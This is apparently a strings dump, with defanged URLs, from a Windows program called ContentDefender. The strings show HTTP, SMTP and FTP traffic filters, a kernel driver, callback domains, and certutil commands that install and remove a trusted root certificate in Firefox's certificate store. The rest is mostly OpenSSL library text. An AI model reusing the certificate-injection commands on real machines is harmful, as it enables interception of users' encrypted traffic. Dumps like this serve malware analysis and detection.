SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
{"level":"%u","type":"%u","process":"ContentDefender","text":"%s","os":"Windows %u.%u %u bit",
{"level":"%u","type":"%u","process":"ContentDefender","text":"%s","os":"Windows %u.%u %u bit",
Content-type:application/x-www-form-urlencoded; charset=utf8
Content-type:application/x-www-form-urlencoded; charset=utf8
Checking for process id: %u
Checking for process id: %u
Process with id %u recognized as %s
Process with id %u recognized as %s
%s %u.%u
%s %u.%u
opera
opera
firefox
firefox
https
https
Request URL is empty
Request URL is empty
getLink src URL opening failed
getLink src URL opening failed
HTTP/1.1
HTTP/1.1
Code detected as error: %s
Code detected as error: %s
key opening failure
key opening failure
HTTP/1.1 204 No Content
HTTP/1.1 204 No Content
ConDefSetup.exe
ConDefSetup.exe
Content type for endpoint %u is %s
Content type for endpoint %u is %s
url: %s code: %s
url: %s code: %s
{"os":"Windows %u.%u",
{"os":"Windows %u.%u",
"%s",
"%s",
Content-type:application/x-www-form-urlencoded
Content-type:application/x-www-form-urlencoded
Looking for certificate
Looking for certificate
\Content Defender\nss\certutil.exe -D -n "ContentDefender 2" -d
\Content Defender\nss\certutil.exe -D -n "ContentDefender 2" -d
Looking for certificate in folders
Looking for certificate in folders
\Content Defender\cert
\Content Defender\cert
Cleaning certificate folder
Cleaning certificate folder
Certificate parsing error
Certificate parsing error
2.5.4.3
2.5.4.3
Certificate Name is
Certificate Name is
/version/%uu
/version/%uu
cert
cert
FAdvapi32.dll
FAdvapi32.dll
RegOpenKeyTransactedA
RegOpenKeyTransactedA
RegCreateKeyTransactedA
RegCreateKeyTransactedA
RegDeleteKeyTransactedA
RegDeleteKeyTransactedA
FRegDeleteKeyExA
FRegDeleteKeyExA
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG
{3E0DB45B-9FCC-4064-B48C-080BD03A99A4}
{3E0DB45B-9FCC-4064-B48C-080BD03A99A4}
HTTP/1.1 404 Not OK
HTTP/1.1 404 Not OK
Web Content Blocked by Content Defender
"
Web Content Blocked by Content Defender
"
Mscoree.dll
Mscoree.dll
hXXp://contentdefender-cis1.org
hXXp://contentdefender-cis1.org
hXXp://contentdefender-cis2.org
hXXp://contentdefender-cis2.org
hXXp://contentdefender-cis3.org
hXXp://contentdefender-cis3.org
hXXp://contentdefender-cis4.org
hXXp://contentdefender-cis4.org
hXXp://contentdefender-cis5.org
hXXp://contentdefender-cis5.org
SOFTWARE\Microsoft\Windows NT\CurrentVersion
SOFTWARE\Microsoft\Windows NT\CurrentVersion
%u.%u
%u.%u
successurl
successurl
hXXp://contentdefender-cis1.org/data/get/
hXXp://contentdefender-cis1.org/data/get/
hXXp://contentdefender-cis1.org/error/index/
hXXp://contentdefender-cis1.org/error/index/
contentdefender-cis1.org
contentdefender-cis1.org
contentdefenderdrv.sys
contentdefenderdrv.sys
hXXp://contentdefender-cis1.org/version/checknew/
hXXp://contentdefender-cis1.org/version/checknew/
%s open failed, code %u
%s open failed, code %u
Domain filtering: %s Words filtering: %s
Domain filtering: %s Words filtering: %s
%u badwords detected
%u badwords detected
Opening of words key failed
Opening of words key failed
function not supported
function not supported
operation canceled
operation canceled
address_family_not_supported
address_family_not_supported
operation_in_progress
operation_in_progress
operation_not_supported
operation_not_supported
protocol_not_supported
protocol_not_supported
operation_would_block
operation_would_block
address family not supported
address family not supported
broken pipe
broken pipe
inappropriate io control operation
inappropriate io control operation
not supported
not supported
operation in progress
operation in progress
operation not permitted
operation not permitted
operation not supported
operation not supported
operation would block
operation would block
protocol not supported
protocol not supported
operator
operator
GetProcessWindowStation
GetProcessWindowStation
\\.\CtrlSM
\\.\CtrlSM
system32\drivers\%s.sys
system32\drivers\%s.sys
SYSTEM\CurrentControlSet\Services\%s
SYSTEM\CurrentControlSet\Services\%s
Tcpip
Tcpip
SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters
SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
Wtsapi32.dll
Wtsapi32.dll
SSL\SSLDataProvider.cpp
SSL\SSLDataProvider.cpp
critical,keyCertSign,cRLSign
critical,keyCertSign,cRLSign
%s-%s#ss
%s-%s#ss
%s-%s-%s#child
%s-%s-%s#child
1.3.6.1.5.5.7.3.1
1.3.6.1.5.5.7.3.1
1.3.6.1.4.1.311.10.3.3
1.3.6.1.4.1.311.10.3.3
2.16.840.1.113730.4.1
2.16.840.1.113730.4.1
127.0.0.1
127.0.0.1
HTTP/1.
HTTP/1.
http/1.
http/1.
PORT
PORT
504 Unsupported transfer mode
504 Unsupported transfer mode
504 Unsupported command
504 Unsupported command
PORT
PORT
%s.%s.%s.%s:%d
%s.%s.%s.%s:%d
%s:%s
%s:%s
[%s]:%s
[%s]:%s
File-Count: %d
File-Count: %d
Total-Bytes: %d
Total-Bytes: %d
File-Name: %s
File-Name: %s
{0946134E-4C7F-11D1-8222-444553540000}
{0946134E-4C7F-11D1-8222-444553540000}
C:\prg\ContentDefender\Release\ContentDefender.pdb
C:\prg\ContentDefender\Release\ContentDefender.pdb
GetProcessHeap
GetProcessHeap
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegCloseKey
RegCloseKey
RegOpenKeyExA
RegOpenKeyExA
ReportEventA
ReportEventA
RegCreateKeyExA
RegCreateKeyExA
RegDeleteKeyA
RegDeleteKeyA
RegEnumKeyExA
RegEnumKeyExA
RegQueryInfoKeyA
RegQueryInfoKeyA
RegQueryInfoKeyW
RegQueryInfoKeyW
ADVAPI32.dll
ADVAPI32.dll
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
InternetCanonicalizeUrlA
InternetCanonicalizeUrlA
InternetOpenUrlA
InternetOpenUrlA
HttpOpenRequestA
HttpOpenRequestA
HttpSendRequestA
HttpSendRequestA
HttpQueryInfoA
HttpQueryInfoA
WININET.dll
WININET.dll
PSAPI.DLL
PSAPI.DLL
VERSION.dll
VERSION.dll
CertOpenStore
CertOpenStore
CertCloseStore
CertCloseStore
CertEnumCertificatesInStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
CertDuplicateCertificateContext
CertFreeCertificateContext
CertFreeCertificateContext
CertDeleteCertificateFromStore
CertDeleteCertificateFromStore
CertEnumSystemStore
CertEnumSystemStore
CertGetNameStringA
CertGetNameStringA
CertCreateContext
CertCreateContext
CRYPT32.dll
CRYPT32.dll
WS2_32.dll
WS2_32.dll
SSLEAY32.dll
SSLEAY32.dll
LIBEAY32.dll
LIBEAY32.dll
GetCPInfo
GetCPInfo
CertAddEncodedCertificateToStore
CertAddEncodedCertificateToStore
CertGetCertificateChain
CertGetCertificateChain
CertVerifyCertificateChainPolicy
CertVerifyCertificateChainPolicy
CertFreeCertificateChain
CertFreeCertificateChain
CertOpenSystemStoreA
CertOpenSystemStoreA
CertFindCertificateInStore
CertFindCertificateInStore
CertAddCertificateContextToStore
CertAddCertificateContextToStore
PFXExportCertStoreEx
PFXExportCertStoreEx
zcÁ
zcÁ
.?AV?$CAtlExeModuleT@VCContentDefenderModule@@@ATL@@
.?AV?$CAtlExeModuleT@VCContentDefenderModule@@@ATL@@
.?AVHttpFilter@@
.?AVHttpFilter@@
.?AVCUrlChecker@@
.?AVCUrlChecker@@
.?AVHTTPFilter@ProtocolFilters@@
.?AVHTTPFilter@ProtocolFilters@@
.?AVSMTPFilter@ProtocolFilters@@
.?AVSMTPFilter@ProtocolFilters@@
.?AVFTPFilter@ProtocolFilters@@
.?AVFTPFilter@ProtocolFilters@@
.?AVFTPDataFilter@ProtocolFilters@@
.?AVFTPDataFilter@ProtocolFilters@@
200054151
200054151
%Program Files%\Content Defender\ContentDefender.exe
%Program Files%\Content Defender\ContentDefender.exe
ForceRemove {9B7395C3-28B5-445E-AA7D-539B63514CAB} = s 'DefenderControl Class'
ForceRemove {9B7395C3-28B5-445E-AA7D-539B63514CAB} = s 'DefenderControl Class'
val ServerExecutable = s '%MODULE_RAW%'
val ServerExecutable = s '%MODULE_RAW%'
TypeLib = s '{CCA2A357-CCB4-41C9-B6F5-4F202B8CDC82}'
TypeLib = s '{CCA2A357-CCB4-41C9-B6F5-4F202B8CDC82}'
&iTXtXML:com.adobe.xmp
&iTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?>
stdole2.tlbWWW
stdole2.tlbWWW
Created by MIDL version 7.00.0555 at Wed Nov 11 21:55:10 2015
Created by MIDL version 7.00.0555 at Wed Nov 11 21:55:10 2015
>,?9?>?[?
>,?9?>?[?
: :):0:<:>
: :):0:<:>
0 0*00060
0 0*00060
4 4M4x4
4 4M4x4
2-282m2}2
2-282m2}2
1%1*1/141=1
1%1*1/141=1
5 5$5(5,5054585
5 5$5(5,5054585
9 9$9(9,9
9 9$9(9,9
4 4$4(4,4044484
4 4$4(4,4044484
sOLEAUT32.DLL
sOLEAUT32.DLL
B{3E0DB45B-9FCC-4064-B48C-080BD03A99A4}
B{3E0DB45B-9FCC-4064-B48C-080BD03A99A4}
combase.dll
combase.dll
mscoree.dll
mscoree.dll
kernel32.dll
kernel32.dll
- floating point support not loaded
- floating point support not loaded
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
USER32.DLL
USER32.DLL
\*.cer
\*.cer
\cert.db
\cert.db
\x.db
\x.db
\xtls.db
\xtls.db
\xv.db
\xv.db
nss\certutil -A -t "TCu" -i "
nss\certutil -A -t "TCu" -i "
opcacrt6.dat
opcacrt6.dat
ca-certs
ca-certs
%Program Files%\Content Defender\cert
%Program Files%\Content Defender\cert
1.15.0.1
1.15.0.1
ContentDefender.exe
ContentDefender.exe
%original file name%.exe_1040_rwx_10001000_00148000:
|$@3|$
|$@3|$
SHA1 block transform for x86, CRYPTOGAMS by
SHA1 block transform for x86, CRYPTOGAMS by
SHA256 block transform for x86, CRYPTOGAMS by
SHA256 block transform for x86, CRYPTOGAMS by
DlSHA512 block transform for x86, CRYPTOGAMS by
DlSHA512 block transform for x86, CRYPTOGAMS by
RC4 for x86, CRYPTOGAMS by
RC4 for x86, CRYPTOGAMS by
6-9'6-9'
6-9'6-9'
$6.:$6.:
$6.:$6.:
*?#1*?#1
*?#1*?#1
>8$4,8$4,
>8$4,8$4,
AES for x86, CRYPTOGAMS by
AES for x86, CRYPTOGAMS by
AES for Intel AES-NI, CRYPTOGAMS by
AES for Intel AES-NI, CRYPTOGAMS by
Camellia for x86 by
Camellia for x86 by
GHASH for x86, CRYPTOGAMS by
GHASH for x86, CRYPTOGAMS by
Montgomery Multiplication for x86, CRYPTOGAMS by
Montgomery Multiplication for x86, CRYPTOGAMS by
GF(2^m) Multiplication for x86, CRYPTOGAMS by
GF(2^m) Multiplication for x86, CRYPTOGAMS by
FtPS
FtPS
.EKSWU
.EKSWU
FTPG
FTPG
FTPj
FTPj
`Txs.Ux
`Txs.Ux
OPENSSL_Uplink(%p,X):
OPENSSL_Uplink(%p,X):
ssl_sess_cert
ssl_sess_cert
ssl_cert
ssl_cert
evp_pkey
evp_pkey
x509_pkey
x509_pkey
%s(%d): OpenSSL internal error, assertion failed: %s
%s(%d): OpenSSL internal error, assertion failed: %s
thread=%lu, file=%s, line=%d, info="
thread=%lu, file=%s, line=%d, info="
number=%d, address=lX
number=%d, address=lX
%5lu file=%s, line=%d,
%5lu file=%s, line=%d,
[d:d:d]
[d:d:d]
%ld bytes leaked in %d chunks
%ld bytes leaked in %d chunks
platform: %s
platform: %s
compiler: %s
compiler: %s
cl -DOPENSSL_EXPERIMENTAL_JPAKE /MD /Ox /O2 /Ob2 -DOPENSSL_THREADS -DDSO_WIN32 -W3 -Gs0 -GF -Gy -nologo -DOPENSSL_SYSNAME_WIN32 -DWIN32_LEAN_AND_MEAN -DL_ENDIAN -D_CRT_SECURE_NO_DEPRECATE -DOPENSSL_EXPERIMENTAL_JPAKE -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DMD5_ASM -DRMD160_ASM -DAES_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DOPENSSL_USE_APPLINK -I. -D_BIND_TO_CURRENT_VCLIBS_VERSION=1 /GS -DOPENSSL_NO_IDEA -DOPENSSL_NO_RC5 -DOPENSSL_NO_MD2 -DOPENSSL_NO_MDC2 -DOPENSSL_NO_KRB5 -DOPENSSL_NO_DYNAMIC_ENGINE
cl -DOPENSSL_EXPERIMENTAL_JPAKE /MD /Ox /O2 /Ob2 -DOPENSSL_THREADS -DDSO_WIN32 -W3 -Gs0 -GF -Gy -nologo -DOPENSSL_SYSNAME_WIN32 -DWIN32_LEAN_AND_MEAN -DL_ENDIAN -D_CRT_SECURE_NO_DEPRECATE -DOPENSSL_EXPERIMENTAL_JPAKE -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DMD5_ASM -DRMD160_ASM -DAES_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DOPENSSL_USE_APPLINK -I. -D_BIND_TO_CURRENT_VCLIBS_VERSION=1 /GS -DOPENSSL_NO_IDEA -DOPENSSL_NO_RC5 -DOPENSSL_NO_MD2 -DOPENSSL_NO_MDC2 -DOPENSSL_NO_KRB5 -DOPENSSL_NO_DYNAMIC_ENGINE
built on: %s
built on: %s
OpenSSL 1.0.1g 7 Apr 2014
OpenSSL 1.0.1g 7 Apr 2014
fips mode not supported
fips mode not supported
MD4 part of OpenSSL 1.0.1g 7 Apr 2014
MD4 part of OpenSSL 1.0.1g 7 Apr 2014
MD5 part of OpenSSL 1.0.1g 7 Apr 2014
MD5 part of OpenSSL 1.0.1g 7 Apr 2014
SHA part of OpenSSL 1.0.1g 7 Apr 2014
SHA part of OpenSSL 1.0.1g 7 Apr 2014
SHA1 part of OpenSSL 1.0.1g 7 Apr 2014
SHA1 part of OpenSSL 1.0.1g 7 Apr 2014
SHA-256 part of OpenSSL 1.0.1g 7 Apr 2014
SHA-256 part of OpenSSL 1.0.1g 7 Apr 2014
SHA-512 part of OpenSSL 1.0.1g 7 Apr 2014
SHA-512 part of OpenSSL 1.0.1g 7 Apr 2014
len>=0 && lenkey)
len>=0 && lenkey)
j key)
j key)
hexkey
hexkey
RIPE-MD160 part of OpenSSL 1.0.1g 7 Apr 2014
RIPE-MD160 part of OpenSSL 1.0.1g 7 Apr 2014
libdes part of OpenSSL 1.0.1g 7 Apr 2014
libdes part of OpenSSL 1.0.1g 7 Apr 2014
DES part of OpenSSL 1.0.1g 7 Apr 2014
DES part of OpenSSL 1.0.1g 7 Apr 2014
des(%s,%s,%s,%s)
des(%s,%s,%s,%s)
!"#$% !"#$%&'()* ,-./0123456789:;?@ABCD./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzRC2 part of OpenSSL 1.0.1g 7 Apr 2014
!"#$% !"#$%&'()* ,-./0123456789:;?@ABCD./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzRC2 part of OpenSSL 1.0.1g 7 Apr 2014
:Blowfish part of OpenSSL 1.0.1g 7 Apr 2014
:Blowfish part of OpenSSL 1.0.1g 7 Apr 2014
CAST part of OpenSSL 1.0.1g 7 Apr 2014
CAST part of OpenSSL 1.0.1g 7 Apr 2014
AES part of OpenSSL 1.0.1g 7 Apr 2014
AES part of OpenSSL 1.0.1g 7 Apr 2014
in && out && key && ivec
in && out && key && ivec
.pp@0
.pp@0
aEÐ
aEÐ
(#EÚ
(#EÚ
ÚE
ÚE
Big Number part of OpenSSL 1.0.1g 7 Apr 2014
Big Number part of OpenSSL 1.0.1g 7 Apr 2014
bn(%d,%d)
bn(%d,%d)
%'%1$=%C%K%O%s%
%'%1$=%C%K%O%s%
.%.-.3.7.9.?.W.[.o.y.
.%.-.3.7.9.?.W.[.o.y.
C%C'C3C7C9COCWCiC
C%C'C3C7C9COCWCiC
RSA part of OpenSSL 1.0.1g 7 Apr 2014
RSA part of OpenSSL 1.0.1g 7 Apr 2014
unsupported signature type
unsupported signature type
unsupported mask parameter
unsupported mask parameter
unsupported mask algorithm
unsupported mask algorithm
rsa operations not supported
rsa operations not supported
operation not supported for this keytype
operation not supported for this keytype
operation not allowed in fips mode
operation not allowed in fips mode
key size too small
key size too small
invalid keybits
invalid keybits
illegal or unsupported padding mode
illegal or unsupported padding mode
digest too big for rsa key
digest too big for rsa key
data too small for key size
data too small for key size
data too large for key size
data too large for key size
RSA_generate_key_ex
RSA_generate_key_ex
RSA_generate_key
RSA_generate_key
RSA_check_key
RSA_check_key
RSA_BUILTIN_KEYGEN
RSA_BUILTIN_KEYGEN
PKEY_RSA_VERIFYRECOVER
PKEY_RSA_VERIFYRECOVER
PKEY_RSA_VERIFY
PKEY_RSA_VERIFY
PKEY_RSA_SIGN
PKEY_RSA_SIGN
PKEY_RSA_CTRL_STR
PKEY_RSA_CTRL_STR
PKEY_RSA_CTRL
PKEY_RSA_CTRL
Public-Key: (%d bit)
Public-Key: (%d bit)
Private-Key: (%d bit)
Private-Key: (%d bit)
rsa_keygen_pubexp
rsa_keygen_pubexp
rsa_keygen_bits
rsa_keygen_bits
DSA part of OpenSSL 1.0.1g 7 Apr 2014
DSA part of OpenSSL 1.0.1g 7 Apr 2014
priv_key
priv_key
pub_key
pub_key
PKEY_DSA_KEYGEN
PKEY_DSA_KEYGEN
PKEY_DSA_CTRL
PKEY_DSA_CTRL
DSA_generate_key
DSA_generate_key
%s: (%d bit)
%s: (%d bit)
Public-Key
Public-Key
Private-Key
Private-Key
functionality not supported
functionality not supported
WIN32_JOINER
WIN32_JOINER
%s.dll
%s.dll
KERNEL32.DLL
KERNEL32.DLL
.\crypto\dh\dh_key.c
.\crypto\dh\dh_key.c
Diffie-Hellman part of OpenSSL 1.0.1g 7 Apr 2014
Diffie-Hellman part of OpenSSL 1.0.1g 7 Apr 2014
keys not set
keys not set
invalid public key
invalid public key
PKEY_DH_KEYGEN
PKEY_DH_KEYGEN
PKEY_DH_DERIVE
PKEY_DH_DERIVE
GENERATE_KEY
GENERATE_KEY
DH_generate_key
DH_generate_key
DH_compute_key
DH_compute_key
COMPUTE_KEY
COMPUTE_KEY
recommended-private-length: %d bits
recommended-private-length: %d bits
public-key:
public-key:
private-key:
private-key:
PKCS#3 DH Public-Key
PKCS#3 DH Public-Key
PKCS#3 DH Private-Key
PKCS#3 DH Private-Key
EC part of OpenSSL 1.0.1g 7 Apr 2014
EC part of OpenSSL 1.0.1g 7 Apr 2014
unsupported field
unsupported field
passed null parameter
passed null parameter
not a supported NIST prime
not a supported NIST prime
missing private key
missing private key
invalid private key
invalid private key
gf2m not supported
gf2m not supported
PKEY_EC_SIGN
PKEY_EC_SIGN
PKEY_EC_PARAMGEN
PKEY_EC_PARAMGEN
PKEY_EC_KEYGEN
PKEY_EC_KEYGEN
PKEY_EC_DERIVE
PKEY_EC_DERIVE
PKEY_EC_CTRL_STR
PKEY_EC_CTRL_STR
PKEY_EC_CTRL
PKEY_EC_CTRL
o2i_ECPublicKey
o2i_ECPublicKey
i2o_ECPublicKey
i2o_ECPublicKey
i2d_ECPrivateKey
i2d_ECPrivateKey
EC_KEY_set_public_key_affine_coordinates
EC_KEY_set_public_key_affine_coordinates
EC_KEY_print_fp
EC_KEY_print_fp
EC_KEY_print
EC_KEY_print
EC_KEY_new
EC_KEY_new
EC_KEY_generate_key
EC_KEY_generate_key
EC_KEY_copy
EC_KEY_copy
EC_KEY_check_key
EC_KEY_check_key
ECKEY_TYPE2PARAM
ECKEY_TYPE2PARAM
ECKEY_PUB_ENCODE
ECKEY_PUB_ENCODE
ECKEY_PUB_DECODE
ECKEY_PUB_DECODE
ECKEY_PRIV_ENCODE
ECKEY_PRIV_ENCODE
ECKEY_PRIV_DECODE
ECKEY_PRIV_DECODE
ECKEY_PARAM_DECODE
ECKEY_PARAM_DECODE
ECKEY_PARAM2TYPE
ECKEY_PARAM2TYPE
DO_EC_KEY_PRINT
DO_EC_KEY_PRINT
d2i_ECPrivateKey
d2i_ECPrivateKey
EC_PRIVATEKEY
EC_PRIVATEKEY
publicKey
publicKey
privateKey
privateKey
value.implicitlyCA
value.implicitlyCA
value.parameters
value.parameters
value.named_curve
value.named_curve
p.char_two
p.char_two
p.prime
p.prime
p.ppBasis
p.ppBasis
p.tpBasis
p.tpBasis
p.onBasis
p.onBasis
p.other
p.other
.\crypto\ec\ec_key.c
.\crypto\ec\ec_key.c
x%s
x%s
Basis Type: %s
Basis Type: %s
Field Type: %s
Field Type: %s
ASN1 OID: %s
ASN1 OID: %s
ECDH part of OpenSSL 1.0.1g 7 Apr 2014
ECDH part of OpenSSL 1.0.1g 7 Apr 2014
ECDH_compute_key
ECDH_compute_key
ECDSA part of OpenSSL 1.0.1g 7 Apr 2014
ECDSA part of OpenSSL 1.0.1g 7 Apr 2014
bio callback - unknown type (%d)
bio callback - unknown type (%d)
ctrl(%lu) - %s
ctrl(%lu) - %s
gets(%lu) - %s
gets(%lu) - %s
puts() - %s
puts() - %s
write(%d,%lu) - %s
write(%d,%lu) - %s
write(%d,%lu) - %s fd=%d
write(%d,%lu) - %s fd=%d
read(%d,%lu) - %s
read(%d,%lu) - %s
read(%d,%lu) - %s fd=%d
read(%d,%lu) - %s fd=%d
Free - %s
Free - %s
unsupported method
unsupported method
no port specified
no port specified
no port defined
no port defined
no accept port specified
no accept port specified
broken pipe
broken pipe
BIO_get_port
BIO_get_port
%d.%d.%d.%d
%d.%d.%d.%d
%sx -
%sx -
x%c
x%c
x -
x -
https
https
%s:%s
%s:%s
%d.%d.%d.%d:%d
%d.%d.%d.%d:%d
port='
port='
Stack part of OpenSSL 1.0.1g 7 Apr 2014
Stack part of OpenSSL 1.0.1g 7 Apr 2014
lhash part of OpenSSL 1.0.1g 7 Apr 2014
lhash part of OpenSSL 1.0.1g 7 Apr 2014
num_alloc_nodes = %u
num_alloc_nodes = %u
num_nodes = %u
num_nodes = %u
node %6u -> %3u
node %6u -> %3u
load %d.d actual load %d.d
load %d.d actual load %d.d
%lu nodes used out of %u
%lu nodes used out of %u
RAND part of OpenSSL 1.0.1g 7 Apr 2014
RAND part of OpenSSL 1.0.1g 7 Apr 2014
You need to read the OpenSSL FAQ, hXXp://VVV.openssl.org/support/faq.html
You need to read the OpenSSL FAQ, hXXp://VVV.openssl.org/support/faq.html
passed a null parameter
passed a null parameter
DSO support routines
DSO support routines
x509 certificate routines
x509 certificate routines
error:lX:%s:%s:%s
error:lX:%s:%s:%s
%lu:%s:%s:%d:%s
%lu:%s:%s:%d:%s
Any Extended Key Usage
Any Extended Key Usage
anyExtendedKeyUsage
anyExtendedKeyUsage
supportedAlgorithms
supportedAlgorithms
crossCertificatePair
crossCertificatePair
certificateRevocationList
certificateRevocationList
cACertificate
cACertificate
userCertificate
userCertificate
userPassword
userPassword
supportedApplicationContext
supportedApplicationContext
Microsoft Local Key set
Microsoft Local Key set
LocalKeySet
LocalKeySet
id-Gost28147-89-None-KeyMeshing
id-Gost28147-89-None-KeyMeshing
id-Gost28147-89-CryptoPro-KeyMeshing
id-Gost28147-89-CryptoPro-KeyMeshing
password based MAC
password based MAC
id-PasswordBasedMAC
id-PasswordBasedMAC
X509v3 Certificate Issuer
X509v3 Certificate Issuer
certificateIssuer
certificateIssuer
certicom-arc
certicom-arc
Proxy Certificate Information
Proxy Certificate Information
proxyCertInfo
proxyCertInfo
Microsoft Smartcardlogin
Microsoft Smartcardlogin
msSmartcardLogin
msSmartcardLogin
joint-iso-itu-t
joint-iso-itu-t
JOINT-ISO-ITU-T
JOINT-ISO-ITU-T
set-rootKeyThumb
set-rootKeyThumb
setAttr-Cert
setAttr-Cert
setCext-cCertRequired
setCext-cCertRequired
setCext-certType
setCext-certType
setct-CertResTBE
setct-CertResTBE
setct-CertReqTBEX
setct-CertReqTBEX
setct-CertReqTBE
setct-CertReqTBE
setct-AcqCardCodeMsgTBE
setct-AcqCardCodeMsgTBE
setct-CertInqReqTBS
setct-CertInqReqTBS
setct-CertResData
setct-CertResData
setct-CertReqTBS
setct-CertReqTBS
setct-CertReqData
setct-CertReqData
setct-PCertResTBS
setct-PCertResTBS
setct-PCertReqData
setct-PCertReqData
setct-AcqCardCodeMsg
setct-AcqCardCodeMsg
certificate extensions
certificate extensions
set-certExt
set-certExt
set-msgExt
set-msgExt
id-ecPublicKey
id-ecPublicKey
id-cmc-confirmCertAcceptance
id-cmc-confirmCertAcceptance
id-cmc-getCert
id-cmc-getCert
id-regInfo-certReq
id-regInfo-certReq
id-regCtrl-protocolEncrKey
id-regCtrl-protocolEncrKey
id-regCtrl-oldCertID
id-regCtrl-oldCertID
id-it-revPassphrase
id-it-revPassphrase
id-it-keyPairParamRep
id-it-keyPairParamRep
id-it-keyPairParamReq
id-it-keyPairParamReq
id-it-unsupportedOIDs
id-it-unsupportedOIDs
id-it-caKeyUpdateInfo
id-it-caKeyUpdateInfo
id-it-encKeyPairTypes
id-it-encKeyPairTypes
id-it-signKeyPairTypes
id-it-signKeyPairTypes
id-it-caProtEncCert
id-it-caProtEncCert
id-mod-attribute-cert
id-mod-attribute-cert
id-mod-qualified-cert-93
id-mod-qualified-cert-93
id-mod-qualified-cert-88
id-mod-qualified-cert-88
id-smime-aa-ets-certCRLTimestamp
id-smime-aa-ets-certCRLTimestamp
id-smime-aa-ets-certValues
id-smime-aa-ets-certValues
id-smime-aa-ets-CertificateRefs
id-smime-aa-ets-CertificateRefs
id-smime-aa-ets-otherSigCert
id-smime-aa-ets-otherSigCert
id-smime-aa-smimeEncryptCerts
id-smime-aa-smimeEncryptCerts
id-smime-aa-signingCertificate
id-smime-aa-signingCertificate
id-smime-aa-encrypKeyPref
id-smime-aa-encrypKeyPref
id-smime-aa-msgSigDigest
id-smime-aa-msgSigDigest
id-smime-ct-publishCert
id-smime-ct-publishCert
id-smime-mod-msg-v3
id-smime-mod-msg-v3
sdsiCertificate
sdsiCertificate
x509Certificate
x509Certificate
localKeyID
localKeyID
certBag
certBag
pkcs8ShroudedKeyBag
pkcs8ShroudedKeyBag
keyBag
keyBag
pbeWithSHA1And2-KeyTripleDES-CBC
pbeWithSHA1And2-KeyTripleDES-CBC
pbeWithSHA1And3-KeyTripleDES-CBC
pbeWithSHA1And3-KeyTripleDES-CBC
TLS Web Client Authentication
TLS Web Client Authentication
TLS Web Server Authentication
TLS Web Server Authentication
X509v3 Extended Key Usage
X509v3 Extended Key Usage
extendedKeyUsage
extendedKeyUsage
X509v3 Authority Key Identifier
X509v3 Authority Key Identifier
authorityKeyIdentifier
authorityKeyIdentifier
X509v3 Certificate Policies
X509v3 Certificate Policies
certificatePolicies
certificatePolicies
X509v3 Private Key Usage Period
X509v3 Private Key Usage Period
privateKeyUsagePeriod
privateKeyUsagePeriod
X509v3 Key Usage
X509v3 Key Usage
keyUsage
keyUsage
X509v3 Subject Key Identifier
X509v3 Subject Key Identifier
subjectKeyIdentifier
subjectKeyIdentifier
Netscape Certificate Sequence
Netscape Certificate Sequence
nsCertSequence
nsCertSequence
Netscape CA Policy Url
Netscape CA Policy Url
nsCaPolicyUrl
nsCaPolicyUrl
Netscape Renewal Url
Netscape Renewal Url
nsRenewalUrl
nsRenewalUrl
Netscape CA Revocation Url
Netscape CA Revocation Url
nsCaRevocationUrl
nsCaRevocationUrl
Netscape Revocation Url
Netscape Revocation Url
nsRevocationUrl
nsRevocationUrl
Netscape Base Url
Netscape Base Url
nsBaseUrl
nsBaseUrl
Netscape Cert Type
Netscape Cert Type
nsCertType
nsCertType
Netscape Certificate Extension
Netscape Certificate Extension
nsCertExt
nsCertExt
extendedCertificateAttributes
extendedCertificateAttributes
challengePassword
challengePassword
dhKeyAgreement
dhKeyAgreement
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
EVP part of OpenSSL 1.0.1g 7 Apr 2014
EVP part of OpenSSL 1.0.1g 7 Apr 2014
.\crypto\evp\evp_key.c
.\crypto\evp\evp_key.c
nkey
nkey
%s algorithm "%s" unsupported
%s algorithm "%s" unsupported
Public Key
Public Key
Private Key
Private Key
wrong public key type
wrong public key type
unsupported salt type
unsupported salt type
unsupported private key algorithm
unsupported private key algorithm
unsupported prf
unsupported prf
unsupported key size
unsupported key size
unsupported key derivation function
unsupported key derivation function
unsupported keylength
unsupported keylength
unsupported cipher
unsupported cipher
unsupported algorithm
unsupported algorithm
unsuported number of rounds
unsuported number of rounds
public key not rsa
public key not rsa
private key encode error
private key encode error
private key decode error
private key decode error
operaton not initialized
operaton not initialized
no operation set
no operation set
no key set
no key set
method not supported
method not supported
keygen failure
keygen failure
invalid operation
invalid operation
invalid key length
invalid key length
expecting a ec key
expecting a ec key
expecting a ecdsa key
expecting a ecdsa key
expecting a dsa key
expecting a dsa key
